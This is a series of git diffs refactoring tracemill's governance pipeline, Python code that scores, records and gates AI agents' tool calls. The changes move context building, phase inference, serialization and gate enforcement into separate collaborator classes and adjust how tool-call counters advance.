-                "by_mechanism": list(meta.budget_snapshot.by_mechanism),
-                "by_action": list(meta.budget_snapshot.by_action),
-                "by_structure": list(meta.budget_snapshot.by_structure),
-            }
-        evidence_data = None
-        if meta.evidence:
-            pointers_data = [
-                {
-                    "event_id": p.event_id,
-                    "rule_id": p.rule_id,
-                    "detector": p.detector,
-                    "payload_pointer": p.payload_pointer,
-                }
-                for p in meta.evidence.pointers
-            ]
-            evidence_data = {
-                "canonical_id": meta.evidence.canonical_id,
-                "timestamp": meta.evidence.timestamp.isoformat(),
-                "session_id": meta.evidence.session_id,
-                "mechanism": meta.evidence.mechanism,
-                "effect": meta.evidence.effect,
-                "scope": list(meta.evidence.scope),
-                "role": list(meta.evidence.role),
-                "action": list(meta.evidence.action),
-                "capability": list(meta.evidence.capability),
-                "structure": list(meta.evidence.structure),
-                "source_labels": list(meta.evidence.source_labels),
-                "recommended_action": str(meta.evidence.recommended_action),
-                "risk_score": meta.evidence.risk_score,
-                "risk_factors": list(meta.evidence.risk_factors),
-                "mitre_techniques": list(meta.evidence.mitre_techniques),
-                "pointers": pointers_data,
-            }
-            if meta.evidence.escalation:
-                esc = meta.evidence.escalation
-                evidence_data["escalation"] = {
-                    "canonical_id": esc.canonical_id,
-                    "classification": esc.classification.to_dict() if esc.classification else None,
-                    "recommended_action": str(esc.recommended_action),
-                    "reason_code": esc.reason_code,
-                    "mitre_techniques": list(esc.mitre_techniques),
-                    "pii_taint": esc.pii_taint,
-                    "ifc_violations": esc.ifc_violations,
-                    "tool_name": esc.tool_name,
-                    "tool_args_summary": esc.tool_args_summary,
-                    "session_id": esc.session_id,
-                    "timestamp": esc.timestamp.isoformat(),
-                }
-        mcp_alerts_data = []
-        if meta.mcp_alerts:
-            for alert in meta.mcp_alerts:
-                mcp_alerts_data.append(
-                    {
-                        "tool_name": alert.tool_name,
-                        "server": alert.server,
-                        "alert_type": alert.alert_type,
-                        "previous": alert.previous,
-                        "current": alert.current,
-                        "severity": alert.severity,
-                        "timestamp": alert.timestamp.isoformat(),
-                    }
-                )
-        return {
-            "classification": cls_data,
-            "recommendation": rec_data,
-            "risk": risk_data,
-            "budget": budget_data,
-            "evidence": evidence_data,
-            "mcp_alerts": mcp_alerts_data,
-        }
-
-    def _deserialize_meta(self, data: dict) -> SessionMeta:
-        """Reconstruct SessionMeta from cache — full fidelity for idempotent output."""
-        from tracemill.classify.core import Classification
-        from tracemill.classify.risk import RiskAssessment
-        from tracemill.governance.state import BudgetSnapshot
-
-        risk = None
-        risk_data = data.get("risk")
-        if risk_data:
-            risk = RiskAssessment(
-                score=risk_data.get("score", 0),
-                level=risk_data.get("level", "safe"),
-                confidence=risk_data.get("confidence", "medium"),
-                factors=tuple(risk_data.get("factors", ())),
-                mitre=tuple(risk_data.get("mitre", ())),
-                version="cached",
-            )
-
-        rec = None
-        rec_data = data.get("recommendation")
-        if rec_data and rec_data.get("action"):
-            transform = None
-            transform_data = rec_data.get("transform")
-            if transform_data:
-                transform = TransformSuggestion(
-                    target_kind=transform_data["target_kind"],
-                    path=transform_data["path"],
-                    original=transform_data["original"],
-                    replacement=transform_data.get("replacement"),
-                    rationale=transform_data.get("rationale", ""),
-                    confidence=transform_data.get("confidence", "medium"),
-                )
-            # Only construct recommendation if risk is available (type contract)
-            if risk is not None:
-                rec = RiskRecommendation(
-                    recommended_action=RecommendedAction(rec_data["action"]),
-                    assessment=risk,
-                    reason_code=rec_data.get("reason_code", ""),
-                    canonical_id=rec_data.get("canonical_id") or "",
-                    message=rec_data.get("message"),
-                    transform=transform,
-                )
-
-        cls = None
-        cls_data = data.get("classification")
-        if cls_data:
-            cls = Classification.from_dict(cls_data)
-
-        budget = None
-        budget_data = data.get("budget")
-        if budget_data:
-            budget = BudgetSnapshot(
-                total_tool_calls=budget_data.get("total_tool_calls", 0),
-                total_tokens=budget_data.get("total_tokens", 0),
-                elapsed_seconds=budget_data.get("elapsed_seconds", 0.0),
-                by_effect=_decode_budget_dims(budget_data.get("by_effect", ())),
-                by_capability=_decode_budget_dims(budget_data.get("by_capability", ())),
-                by_scope=_decode_budget_dims(budget_data.get("by_scope", ())),
-                by_role=_decode_budget_dims(budget_data.get("by_role", ())),
-                by_phase=_decode_budget_dims(budget_data.get("by_phase", ())),
-                by_mechanism=_decode_budget_dims(budget_data.get("by_mechanism", ())),
-                by_action=_decode_budget_dims(budget_data.get("by_action", ())),
-                by_structure=_decode_budget_dims(budget_data.get("by_structure", ())),
-                pressure=budget_data.get("pressure", False),
-            )
-
-        evidence = None
-        evidence_data = data.get("evidence")
-        if evidence_data:
-            from datetime import datetime as dt_cls
-
-            pointers = tuple(
-                EvidencePointer(
-                    event_id=p["event_id"],
-                    rule_id=p["rule_id"],
-                    detector=p["detector"],
-                    payload_pointer=p.get("payload_pointer"),
-                )
-                for p in evidence_data.get("pointers", ())
-            )
-            evidence = Evidence(
-                canonical_id=evidence_data.get("canonical_id", ""),
-                timestamp=dt_cls.fromisoformat(evidence_data["timestamp"])
-                if evidence_data.get("timestamp")
-                else datetime.now(timezone.utc),
-                session_id=evidence_data.get("session_id", ""),
-                mechanism=evidence_data.get("mechanism", ""),
-                effect=evidence_data.get("effect"),
-                scope=tuple(evidence_data.get("scope", ())),
-                role=tuple(evidence_data.get("role", ())),
-                action=tuple(evidence_data.get("action", ())),
-                capability=tuple(evidence_data.get("capability", ())),
-                structure=tuple(evidence_data.get("structure", ())),
-                source_labels=tuple(evidence_data.get("source_labels", ())),
-                recommended_action=RecommendedAction(evidence_data["recommended_action"])
-                if evidence_data.get("recommended_action") in tuple(RecommendedAction)
-                else RecommendedAction.ALLOW,
-                risk_score=evidence_data.get("risk_score", 0),
-                risk_factors=tuple(evidence_data.get("risk_factors", ())),
-                mitre_techniques=tuple(evidence_data.get("mitre_techniques", ())),
-                pointers=pointers,
-                escalation=self._deserialize_escalation(evidence_data.get("escalation")),
-            )
-
-        from tracemill.governance.mcp_drift import MCPIntegrityAlert
-
-        mcp_alerts_raw = data.get("mcp_alerts", ())
-        mcp_alerts: tuple = ()
-        if mcp_alerts_raw:
-            alerts_list = []
-            for a in mcp_alerts_raw:
-                if isinstance(a, dict):
-                    alerts_list.append(
-                        MCPIntegrityAlert(
-                            tool_name=a.get("tool_name", ""),
-                            server=a.get("server", ""),
-                            alert_type=a.get("alert_type", "schema_change"),
-                            previous=a.get("previous", ""),
-                            current=a.get("current", ""),
-                            severity=a.get("severity", "info"),
-                            timestamp=datetime.fromisoformat(a["timestamp"])
-                            if a.get("timestamp")
-                            else datetime.now(timezone.utc),
-                        )
-                    )
-                # Legacy string alerts: skip (can't reconstruct typed object)
-            mcp_alerts = tuple(alerts_list)
-
-        return SessionMeta(
-            classification=cls,
-            risk_assessment=risk,
-            recommendation=rec,
-            budget_snapshot=budget,
-            drift=None,
-            mcp_alerts=mcp_alerts,
-            evidence=evidence,
-        )
 
     # ─── Framework gating methods ────────────────────────────────────────────────
     #

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -539,21 +539,23 @@ class GovernancePipeline:
     # ─── Central gate execution helpers ───────────────────────────────────────
 
     def _build_gate_context(self, session_id: str) -> "GateContext":
-        """Build a GateContext from current session state."""
+        """Build a GateContext from current session state.
+
+        Reads only — the counter and decision log are owned by SessionState and
+        exposed through methods. The shield never mutates state from here.
+        """
         from tracemill.sdk.gate_types import GateContext
 
         state = self._states.get(session_id)
-        tool_call_count = state._tool_call_count if state else 0
-        denied_count = state._denied_count if state else 0
-        prior_verdicts = tuple(state._prior_verdicts) if state else ()
-        prior_ids = tuple(state._prior_tool_call_ids) if state else ()
+        if state is None:
+            return GateContext(session_id=session_id, tool_call_count=0, denied_count=0)
 
         return GateContext(
             session_id=session_id,
-            tool_call_count=tool_call_count,
-            denied_count=denied_count,
-            prior_verdicts=prior_verdicts,
-            prior_tool_call_ids=prior_ids,
+            tool_call_count=state.tool_call_count,
+            denied_count=state.denied_count,
+            prior_verdicts=state.prior_verdicts(),
+            prior_tool_call_ids=state.prior_tool_call_ids(),
         )
 
     def _to_tool_call_request(self, trace: "EventTrace") -> "ToolCallRequest":
@@ -698,17 +700,14 @@ class GovernancePipeline:
         return most_severe
 
     def _record_denial(self, session_id: str, verdict: "Verdict") -> None:
-        """Record a denial in session state for GateContext tracking."""
-        state = self._ensure_gate_state(session_id)
-        state._denied_count += 1
-        state._prior_verdicts.append(verdict)  # deque(maxlen=100) auto-evicts
+        """Record a shield denial. Does not touch the tool-call counter."""
+        self._ensure_gate_state(session_id).record_denial(verdict)
 
     def _record_allow(self, session_id: str, *, tool_call_id: str | None = None) -> None:
-        """Record an allow in session state."""
-        state = self._ensure_gate_state(session_id)
-        state._tool_call_count += 1
-        if tool_call_id:
-            state._prior_tool_call_ids.append(tool_call_id)  # deque(maxlen=100) auto-evicts
+        """Record a shield allow. The tool-call counter is NOT advanced here —
+        it advances only when the allowed call is observed at completion
+        (see _observe_completed_call). The shield only reads the counter."""
+        self._ensure_gate_state(session_id).record_allow(tool_call_id=tool_call_id)
 
     def _ensure_gate_state(self, session_id: str):
         """Lazily create minimal session state for gate context tracking.
@@ -1911,21 +1910,41 @@ class GovernancePipeline:
         duration_ms: int | None = None,
         error: str | None = None,
     ) -> "PostflightVerdict":
-        """Run postflight chain and return the verdict for caller enforcement.
+        """Observe the completed call, then run the postflight chain.
 
-        Callers must check verdict.action and act:
+        This is the post-execution point: the call the shield allowed has now
+        run, so the trace observes it here — the single place the tool-call
+        counter advances in the gate channel. Then callers check verdict.action:
           - ACCEPT: return result normally
           - REDACT: strip keys from output before returning
           - SUPPRESS: return empty/neutral output to the model
           - TERMINATE: raise/signal session termination
           - ALERT: return result normally but log alert
         """
+        self._observe_completed_call(trace, session_id=session_id)
         return self._run_postflight(
             trace,
             session_id=session_id,
             output=output,
             duration_ms=duration_ms,
             error=error,
+        )
+
+    def _observe_completed_call(self, trace: "EventTrace", *, session_id: str) -> None:
+        """Advance the single tool-call counter for a shield-allowed call that
+        has now executed. The trace only ever observes what the gate allowed, so
+        this is the one writer of the counter in the gate channel."""
+        state = self._ensure_gate_state(session_id)
+        phase_window = state.snapshot().phase_window
+        state.increment_budget(
+            mechanism=trace.mechanism,
+            effect=trace.effect,
+            scope=frozenset(trace.scope),
+            role=frozenset(trace.role),
+            action=frozenset(trace.action),
+            capability=frozenset(trace.capability),
+            structure=frozenset(trace.structure),
+            phase=phase_window[-1] if phase_window else None,
         )
 
     @staticmethod

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -233,8 +233,17 @@ class GovernancePipeline:
         """
         from tracemill.governance.types import EnrichmentContext, ToolCallEvent
 
+        # Normalize metadata: events may arrive with metadata=None (e.g. pushed
+        # directly, bypassing the Enricher). Fall back to an empty EventMetadata so
+        # attribute access below never raises.
+        metadata = event.metadata
+        if metadata is None:
+            from tracemill.types import EventMetadata
+
+            metadata = EventMetadata()
+
         # Extract classification (already computed by Enricher)
-        classification = event.metadata.classification
+        classification = metadata.classification
         if classification is None:
             from tracemill.classify.core import Classification, Mechanism
 
@@ -256,7 +265,7 @@ class GovernancePipeline:
             session_id=event.session_id,
             timestamp=event.timestamp,
             source_event_key=event.id,
-            span_id=event.metadata.span_id or event.id,
+            span_id=metadata.span_id or event.id,
             tool_name=tool_name,
             server_namespace=server_namespace,
             tool_args_json=tool_args_json,
@@ -735,20 +744,56 @@ class GovernancePipeline:
         self._persist_score(ctx.event.source_event_key, ctx.event.session_id, meta)
         return meta
 
-    def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
+    def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta | None":
         """Observation-path scoring for use as a live pipeline stage.
 
         Unlike :meth:`score_tool_call_event` (read-only preflight), this runs the
-        full state-mutating observation path (budget/taint/drift accrual plus
-        classification, assessment, and recommendation) and returns the
-        ``SessionMeta`` to stamp onto the event's ``metadata.governance``.
+        state-mutating observation path and returns the ``SessionMeta`` to stamp
+        onto the event's ``metadata.governance`` — or ``None`` when the event is
+        not governance-relevant.
 
         This is the method :class:`~tracemill.pipeline.EventPipeline` calls when a
         governance stage is wired in, making governance one stage of the pipeline
-        rather than a separate track.
+        rather than a separate track. Because the stage sees *every* event kind at
+        the sink choke point, it must dispatch by kind:
+
+        * Session lifecycle (``session.started`` / ``session.ended``) →
+          :meth:`process_lifecycle` (Phase 1 only; ``session.ended`` also
+          finalizes the summary and evicts session state).
+        * Tool calls → the state-mutating :meth:`process_event`. Every
+          ``tool.call.completed`` is scored; a ``tool.call.started`` is scored
+          only when it is an id-bearing orphan (an unpaired start flushed at
+          session end / pipeline close, or a displaced duplicate), since the
+          Enricher buffers a paired start into its completion and emits a no-id
+          start's completion separately. This keeps each real tool call observed
+          exactly once.
+        * Any other kind (messages, turns, llm/planning chunks, spans, usage, …)
+          is *not* a tool call and must not advance the tool-call budget, so it is
+          left ungoverned (``None`` → no ``metadata.governance`` stamp).
         """
-        ctx = self.context_from_session_event(event)
-        return self.process_event(ctx)
+        from tracemill.types import EventKind
+
+        kind = event.kind
+        if kind == EventKind.SESSION_STARTED:
+            return self.process_lifecycle(event.session_id, "session_start")
+        if kind == EventKind.SESSION_ENDED:
+            return self.process_lifecycle(event.session_id, "session_end")
+        if kind == EventKind.TOOL_CALL_COMPLETED:
+            return self.process_event(self.context_from_session_event(event))
+        if kind == EventKind.TOOL_CALL_STARTED:
+            # A started event only reaches the stage (rather than being buffered)
+            # as either a genuine orphan — an unpaired start flushed at session
+            # end / pipeline close, or a displaced duplicate, all of which carry a
+            # tool_call_id and MUST be scored since no completion will — or a no-id
+            # "provisional" start the Enricher cannot pair, whose completion is
+            # emitted and scored separately. Scoring the latter would double-count,
+            # so discriminate on the same id the Enricher pairs on.
+            from tracemill.enricher import _extract_tool_call_id
+
+            if _extract_tool_call_id(event) is None:
+                return None
+            return self.process_event(self.context_from_session_event(event))
+        return None
 
     def _persist_score(self, source_event_key: str, session_id: str, meta: "SessionMeta") -> None:
         """Persist a scoring result to the audit trail.

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -6,10 +6,11 @@ import json
 import sqlite3
 import uuid
 from datetime import datetime, timezone
-from typing import TYPE_CHECKING, Literal
+from typing import TYPE_CHECKING
 
 from tracemill.governance.assessor import DefaultAssessor
 from tracemill.governance.codec import MetaCodec
+from tracemill.governance.context import ContextBuilder
 from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.shield import Shield
 from tracemill.governance.results import (
@@ -73,6 +74,7 @@ class GovernancePipeline:
         self._assessor = DefaultAssessor(labeler, rules, engine)
         self._shield = Shield(self._registry, lambda: self.policy, self._score_event)
         self._codec = MetaCodec()
+        self._context = ContextBuilder(engine, project_root)
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -205,227 +207,12 @@ class GovernancePipeline:
     def context_from_session_event(
         self, event: "tracemill.types.SessionEvent"
     ) -> "EnrichmentContext":
-        """Bridge: convert an enriched SessionEvent (from adapters/Enricher) into an EnrichmentContext.
-
-        This is the canonical path for observation pipeline events. The Enricher
-        has already classified the event and stored the result in event.metadata.
-        We extract that classification and build the governance context.
-        """
-        from tracemill.governance.types import EnrichmentContext, ToolCallEvent
-
-        # Normalize metadata: events may arrive with metadata=None (e.g. pushed
-        # directly, bypassing the Enricher). Fall back to an empty EventMetadata so
-        # attribute access below never raises.
-        metadata = event.metadata
-        if metadata is None:
-            from tracemill.types import EventMetadata
-
-            metadata = EventMetadata()
-
-        # Extract classification (already computed by Enricher)
-        classification = metadata.classification
-        if classification is None:
-            from tracemill.classify.core import Classification, Mechanism
-
-            classification = Classification(mechanism=Mechanism.UNKNOWN, effect=None)
-
-        # Build governance ToolCallEvent from SessionEvent fields
-        tool_name = event.payload.get("tool_name", "")
-        arguments = event.payload.get("arguments", {})
-        server_namespace = event.payload.get("server_namespace")
-
-        import json as _json
-
-        tool_args_json = (
-            _json.dumps(arguments, default=str) if isinstance(arguments, dict) else str(arguments)
-        )
-
-        gov_event = ToolCallEvent(
-            event_id=event.id,
-            session_id=event.session_id,
-            timestamp=event.timestamp,
-            source_event_key=event.id,
-            span_id=metadata.span_id or event.id,
-            tool_name=tool_name,
-            server_namespace=server_namespace,
-            tool_args_json=tool_args_json,
-            source_event_id=None,
-            mcp_server_name=event.payload.get("mcp_server_name") or server_namespace,
-            tool_description=event.payload.get("tool_description"),
-            tool_schema_json=event.payload.get("tool_schema_json"),
-        )
-
-        # Build command analysis for shell tools
-        command = ""
-        if isinstance(arguments, dict):
-            command = arguments.get("command", "") or arguments.get("cmd", "")
-        elif isinstance(arguments, str):
-            command = arguments
-        command_analysis = self._build_command_analysis(command) if command else None
-
-        # Derive engine literal
-        mech_str = (
-            classification.mechanism.value
-            if hasattr(classification.mechanism, "value")
-            else str(classification.mechanism)
-        ).lower()
-        if "shell" in mech_str or "process" in mech_str:
-            engine_literal: Literal["shell", "mcp", "coding"] = "shell"
-        elif "mcp" in mech_str:
-            engine_literal = "mcp"
-        else:
-            engine_literal = "coding"
-
-        return EnrichmentContext(
-            event=gov_event,
-            base_classification=classification,
-            command_analysis=command_analysis,
-            session_state=None,
-            mcp_profiles=None,
-            project_root=self._project_root,
-            engine=engine_literal,
-            drift_baseline=None,
-            mcp_profile_key=server_namespace,
-        )
+        """Bridge a SessionEvent into an EnrichmentContext (delegates to ContextBuilder)."""
+        return self._context.from_session_event(event)
 
     def enrich_event(self, event: "ToolCallEvent") -> "EnrichmentContext":
-        """Classify a governance ToolCallEvent and build its EnrichmentContext.
-
-        Used by the assess pathway (raw dict → ToolCallEvent.from_dict → here).
-        For observation pipeline events, use context_from_session_event instead.
-        """
-        import json as _json
-
-        from tracemill.classify.tools import classify_tool, normalize_tool_name
-        from tracemill.governance.types import EnrichmentContext
-
-        tool_name = event.tool_name
-        server_namespace = event.server_namespace
-
-        # MCP namespace synthesis
-        classify_name = tool_name
-        if server_namespace and not tool_name.startswith("mcp__"):
-            prefix = f"{server_namespace}__"
-            base = tool_name[len(prefix) :] if tool_name.startswith(prefix) else tool_name
-            classify_name = f"mcp__{server_namespace}__{base}"
-
-        canonical = normalize_tool_name(classify_name, engine=self._engine)
-        is_shell = canonical == "shell"
-
-        if is_shell:
-            tool_input = _json.loads(event.tool_args_json) if event.tool_args_json else {}
-            command = (
-                tool_input.get("command", "") or tool_input.get("cmd", "")
-                if isinstance(tool_input, dict)
-                else ""
-            )
-            classification = self._classify_shell_for_assess(tool_name, command)
-            command_analysis = self._build_command_analysis(command) if command else None
-        else:
-            classification = classify_tool(classify_name, engine=self._engine)
-            command_analysis = None
-
-        # Derive engine literal
-        mech_str = (
-            classification.mechanism.value
-            if hasattr(classification.mechanism, "value")
-            else str(classification.mechanism)
-        ).lower()
-        if "shell" in mech_str or "process" in mech_str:
-            engine_literal = "shell"
-        elif "mcp" in mech_str:
-            engine_literal = "mcp"
-        else:
-            engine_literal = "coding"
-
-        return EnrichmentContext(
-            event=event,
-            base_classification=classification,
-            command_analysis=command_analysis,
-            session_state=None,
-            mcp_profiles=None,
-            project_root=self._project_root,
-            engine=engine_literal,
-            drift_baseline=None,
-            mcp_profile_key=server_namespace,
-        )
-
-    def _classify_shell_for_assess(self, tool_name: str, command: str):
-        """Shell dialect dispatch for assessment."""
-        from tracemill.classify.cmd import classify_cmd_command
-        from tracemill.classify.coding import CodingMechanism
-        from tracemill.classify.core import Classification
-        from tracemill.classify.powershell import classify_powershell_command
-        from tracemill.classify.shell import classify_shell
-
-        if not command:
-            return Classification(mechanism=CodingMechanism.PROCESS_SHELL, effect=None)
-        lower = tool_name.lower()
-        if lower in ("powershell", "pwsh"):
-            return classify_powershell_command(command, engine=self._engine)
-        if lower == "cmd":
-            return classify_cmd_command(command, engine=self._engine)
-        return classify_shell(command, engine=self._engine)
-
-    def _build_command_analysis(self, command: str):
-        """Build CommandAnalysis using the shell classifier's unwrap logic."""
-        import shlex
-
-        from tracemill.classify.shell import _unwrap_binary
-        from tracemill.governance.types import CommandAnalysis, PipeSegment
-
-        if not command or not command.strip():
-            return None
-        try:
-            tokens = shlex.split(command)
-        except ValueError:
-            tokens = command.split()
-        if not tokens:
-            return None
-
-        binary, _subcmd, flags, _caps = _unwrap_binary(tokens, engine=self._engine)
-        targets = tuple(t for t in tokens[1:] if not t.startswith("-") and t != binary)
-
-        pipe_segments = None
-        if "|" in command and "||" not in command and "|&" not in command:
-            try:
-                lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
-                lexer.whitespace_split = False
-                all_tokens = list(lexer)
-                if "|" in all_tokens:
-                    segments: list[PipeSegment] = []
-                    current: list[str] = []
-                    for tok in all_tokens:
-                        if tok == "|":
-                            if current:
-                                b, _s, f, _c = _unwrap_binary(current, engine=self._engine)
-                                t = tuple(
-                                    x for x in current[1:] if not x.startswith("-") and x != b
-                                )
-                                segments.append(
-                                    PipeSegment(binary=b or current[0], flags=tuple(f), targets=t)
-                                )
-                            current = []
-                        else:
-                            current.append(tok)
-                    if current:
-                        b, _s, f, _c = _unwrap_binary(current, engine=self._engine)
-                        t = tuple(x for x in current[1:] if not x.startswith("-") and x != b)
-                        segments.append(
-                            PipeSegment(binary=b or current[0], flags=tuple(f), targets=t)
-                        )
-                    if len(segments) > 1:
-                        pipe_segments = tuple(segments)
-            except ValueError:
-                pass
-
-        return CommandAnalysis(
-            command=command,
-            binary=binary or tokens[0],
-            flags=tuple(flags),
-            targets=targets,
-            pipe_segments=pipe_segments,
-        )
+        """Classify a ToolCallEvent into an EnrichmentContext (delegates to ContextBuilder)."""
+        return self._context.from_tool_call(event)
 
     def score_tool_call(self, payload: dict) -> "EventTrace":
         """Score a pending tool call against current session state.

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -11,6 +11,7 @@ from typing import TYPE_CHECKING
 from tracemill.governance.assessor import DefaultAssessor
 from tracemill.governance.codec import MetaCodec
 from tracemill.governance.context import ContextBuilder
+from tracemill.governance.phase1 import Phase1
 from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.shield import Shield
 from tracemill.governance.results import (
@@ -63,8 +64,6 @@ class GovernancePipeline:
         policy: "GatePolicy | None" = None,
     ) -> None:
         self._store = store
-        self._labeler = labeler
-        self._budget = budget_tracker
         self._rules = rules
         self._engine = engine
         self._thresholds = thresholds
@@ -72,6 +71,7 @@ class GovernancePipeline:
         self.policy: "GatePolicy | None" = policy
         self._registry = SessionRegistry(store)
         self._assessor = DefaultAssessor(labeler, rules, engine)
+        self._phase1 = Phase1(budget_tracker, labeler)
         self._shield = Shield(self._registry, lambda: self.policy, self._score_event)
         self._codec = MetaCodec()
         self._context = ContextBuilder(engine, project_root)
@@ -476,15 +476,7 @@ class GovernancePipeline:
         transient = state.clone_detached()
 
         # ── Phase 1 simulation (non-persisted) ──
-        phase = self._infer_phase(ctx)
-        if phase:
-            transient.update_phase_window(phase)
-        self._budget.increment(ctx, transient)
-        if self._labeler.has_ifc:
-            ifc_src_labels: set[str] = set()
-            self._labeler.check_ifc(ctx, ifc_src_labels, transient)
-        transient.record_event(None)
-        self._budget.check_pressure(transient)
+        self._phase1.apply(ctx, transient)
 
         # ── Phase 2/3 (side-effect-free) ──
         snapshot = transient.snapshot()
@@ -548,18 +540,7 @@ class GovernancePipeline:
         if not existing:
             # Phase 1 mutations (in-memory) — wrapped for crash recovery
             try:
-                phase = self._infer_phase(ctx)
-                if phase:
-                    state.update_phase_window(phase)
-
-                self._budget.increment(ctx, state)
-
-                if self._labeler.has_ifc:
-                    ifc_src_labels: set[str] = set()
-                    self._labeler.check_ifc(ctx, ifc_src_labels, state)
-
-                state.record_event(None)
-                self._budget.check_pressure(state)
+                self._phase1.apply(ctx, state)
             except Exception as phase1_exc:
                 import logging
 
@@ -811,31 +792,6 @@ class GovernancePipeline:
                     "UPDATE mcp_fingerprints SET last_seen = ? WHERE server = ? AND tool_name = ?",
                     (write.payload, write.server, write.tool_name),
                 )
-
-    def _infer_phase(self, ctx: "EnrichmentContext") -> str | None:
-        """Infer session phase from classification/event."""
-        from tracemill.governance.types import ToolCallEvent
-
-        cls = ctx.base_classification
-        # Network capability takes priority
-        if "network_outbound" in cls.capability:
-            return "network"
-        if cls.effect == "read_only":
-            return "exploration"
-        if cls.effect == "destructive":
-            return "destructive"
-        if cls.effect == "mutating":
-            tool_name = ""
-            if isinstance(ctx.event, ToolCallEvent):
-                tool_name = (ctx.event.tool_name or "").lower()
-            if "test" in tool_name or "verify" in tool_name or "check" in tool_name:
-                return "testing"
-            if "deploy" in tool_name or "publish" in tool_name:
-                return "deployment"
-            return "implementation"
-        if cls.effect == "informational":
-            return "exploration"
-        return "exploration"
 
     def _write_session_summary(self, session_id: str, snapshot: "SessionStateSnapshot") -> None:
         """Write session summary to session_summaries table (idempotent — won't overwrite existing)."""

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -1,4 +1,8 @@
-"""Governance pipeline orchestrator — Phases 1, 2, 3 and evidence construction."""
+"""Governance composition-root facade.
+
+Wires the governance collaborator graph and forwards the public API to them
+(monitor, scorer, context builder, shield). No governance logic lives here.
+"""
 
 from __future__ import annotations
 
@@ -18,7 +22,7 @@ if TYPE_CHECKING:
     import tracemill.types
 
     from tracemill.classify.config import ClassificationEngine
-    from tracemill.governance.budget import BudgetThresholds, BudgetTracker
+    from tracemill.governance.budget import BudgetTracker
     from tracemill.governance.labeler import GovernanceLabeler
     from tracemill.governance.persistence import SystemStore
     from tracemill.governance.rules import Rule
@@ -44,7 +48,20 @@ def _import_dotted(dotted_path: str):
 
 
 class GovernancePipeline:
-    """Orchestrates Phases 1, 2, 3 of the governance enrichment pipeline."""
+    """Composition-root facade for the governance subsystem.
+
+    Constructs the collaborator object graph (registry, assessor, phase-1,
+    codec, context builder, scorer, shield, monitor) and exposes the public API
+    by delegating to them:
+
+    * observation / lifecycle / state → :class:`SessionMonitor` (the single writer)
+    * read-only scoring & previews → :class:`Scorer`
+    * event → context bridging → :class:`ContextBuilder`
+    * enforcement (preflight/postflight) → :class:`Shield`, to which the
+      ``gate_*`` framework adapters bind at the edge.
+
+    It holds no governance logic of its own — only wiring and forwards.
+    """
 
     def __init__(
         self,
@@ -53,16 +70,15 @@ class GovernancePipeline:
         budget_tracker: "BudgetTracker",
         rules: "list[Rule]",
         engine: "ClassificationEngine",
-        thresholds: "BudgetThresholds | None" = None,
         project_root: str | None = None,
         policy: "GatePolicy | None" = None,
     ) -> None:
+        # ── Facade-observable state ──
         self._store = store
-        self._rules = rules
-        self._engine = engine
-        self._thresholds = thresholds
         self._project_root = project_root
         self.policy: "GatePolicy | None" = policy
+
+        # ── Collaborator object graph (composition root; DIP wiring) ──
         self._registry = SessionRegistry(store)
         self._assessor = DefaultAssessor(labeler, rules, engine)
         self._phase1 = Phase1(budget_tracker, labeler)
@@ -157,7 +173,6 @@ class GovernancePipeline:
             budget_tracker=BudgetTracker(thresholds=thresholds),
             rules=rules,
             engine=engine,
-            thresholds=thresholds,
             policy=policy,
         )
         instance._project_root = config.project_root

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -10,6 +10,7 @@ from typing import TYPE_CHECKING, Literal
 
 from tracemill.governance.assessor import DefaultAssessor
 from tracemill.governance.registry import SessionRegistry
+from tracemill.governance.shield import Shield
 from tracemill.governance.results import (
     Evidence,
     EvidencePointer,
@@ -34,12 +35,7 @@ if TYPE_CHECKING:
         ToolCallEvent,
     )
     from tracemill.sdk.gate_policy import GatePolicy
-    from tracemill.sdk.gate_types import (
-        GateContext,
-        PostflightVerdict,
-        ToolCallRequest,
-        ToolCallResult,
-    )
+    from tracemill.sdk.gate_types import PostflightVerdict
     from tracemill.sdk.verdict import Verdict
 
 
@@ -81,8 +77,6 @@ class GovernancePipeline:
         project_root: str | None = None,
         policy: "GatePolicy | None" = None,
     ) -> None:
-        import threading
-
         self._store = store
         self._labeler = labeler
         self._budget = budget_tracker
@@ -91,9 +85,9 @@ class GovernancePipeline:
         self._thresholds = thresholds
         self._project_root = project_root
         self.policy: "GatePolicy | None" = policy
-        self._gate_lock = threading.Lock()
         self._registry = SessionRegistry(store)
         self._assessor = DefaultAssessor(labeler, rules, engine)
+        self._shield = Shield(self._registry, lambda: self.policy, self._score_event)
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -539,112 +533,9 @@ class GovernancePipeline:
 
     # ─── Central gate execution helpers ───────────────────────────────────────
 
-    def _build_gate_context(self, session_id: str) -> "GateContext":
-        """Build a GateContext from current session state.
-
-        Reads only — the counter and decision log are owned by SessionState and
-        exposed through methods. The shield never mutates state from here.
-        """
-        from tracemill.sdk.gate_types import GateContext
-
-        state = self._registry.get(session_id)
-        if state is None:
-            return GateContext(session_id=session_id, tool_call_count=0, denied_count=0)
-
-        return GateContext(
-            session_id=session_id,
-            tool_call_count=state.tool_call_count,
-            denied_count=state.denied_count,
-            prior_verdicts=state.prior_verdicts(),
-            prior_tool_call_ids=state.prior_tool_call_ids(),
-        )
-
-    def _to_tool_call_request(self, trace: "EventTrace") -> "ToolCallRequest":
-        """Convert a fully-assessed EventTrace into a gate-facing ToolCallRequest."""
-        from tracemill.sdk.gate_types import ToolCallRequest
-
-        return ToolCallRequest(
-            tool=trace.canonical_tool or trace.tool_name or "unknown",
-            input=trace.tool_input,
-            target=trace.target_resource,
-            mechanism=trace.mechanism or "unknown",
